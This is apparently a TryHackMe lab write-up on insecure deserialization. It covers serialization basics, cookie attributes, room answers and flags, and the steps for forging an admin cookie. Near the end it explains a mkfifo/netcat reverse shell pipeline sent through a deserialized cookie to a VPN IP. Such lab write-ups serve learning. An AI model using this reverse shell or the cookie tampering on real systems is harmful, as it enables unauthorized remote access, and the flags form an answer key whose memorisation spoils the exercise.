Insecure Deserialization
Date: 02, January, 2021
Author: Dhilip Sanjay S
Serialization and Deserialization
Serialization is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks.
Deserialization is the process of converting serialized information into their complex form - an object that the application will be able to understand.
Insecure Deserialization
Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application
It involves sreplacing data processed by an application with malicious code - allowing DoS to RCE.
Low exploitability - attacker needs to have a good understanding of the inner-workings of the application.
The exploit is only as dangerous as the attacker's skill permits.
What's vulnerable?
Any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained.
Few examples of applications:
E-commerce Sites
Forums
API's
Application Runtimes (Tomcat, Jenkins, Jboss, etc)
Insecure Deserialization - Objects
In OOP, objects are made up of two things:
State
Behaviour
Insecure Deserialization - cookies
Cookies are tiny peices of data - created and stored by website on the user's computer.
Cookies store login information like sessionId.
Attributes of cookies:
Attribute | Description | Required? |
---|---|---|
Cookie Name | Name of the cookie | Yes |
Cookie Value | Anything Plaintext or encoded | Yes |
Secure Only | If set, this cookie will only be set over HTTPS connection | No |
Expire | Set a timestamp for cookie expiry | No |
Path | Cookie will only be sent if the specified URL is within the request | No |
Solutions
Who developed the Tomcat application?
Answer: The Apache Software Foundation
Initially I thought, James Duncan Davidson. But they actually wanted the organization's name.
What type of attack that crashes services can be performed with insecure deserialization?
Answer: Denial of Service
If a dog was sleeping, would this be:
Answer: Behaviour
Note:
Sleep - State
Sleeping - behaviour
What is the name of the base-2 formatting that data is sent across a network as?
Answer: Binary
If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
Answer: webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
Answer: HTTPS
1st flag (cookie value)
Answer: THM{good_old_base64_huh}
Steps to Reproduce:
2nd flag (admin dashboard)
Answer: THM{heres_the_admin_flag}
Steps to Reproduce: Change the
userType
field value toadmin
in the cookie and reload the page.
What is the value in flag.txt?
Answer: 4a69a7ff9fd68
Steps to Reproduce:
Submit a feedback.
You'll have a cookie named
encodedPayload
.Replace the value with the one you get from running
rce.py
.
Explanation of the code:
rm /tmp/f
- removes the file if it exists.mkfifo /tmp/f
- creates a named IO pipe.cat /tmp/f | /bin/sh -i 2>&1
- contents of the named pipe is printed and piped into/bin/sh
.netcat YOUR_TRYHACKME_VPN_IP 1234 > /tmp/f
The output of the commands executed by
/bin/sh
is directed into stdin of nc.The output of nc (commands coming over the network) is redirected to the FIFO.
Listen using netcat:
nc -lvnp 1234
Reload the page.
You will get a reverse shell:
Last updated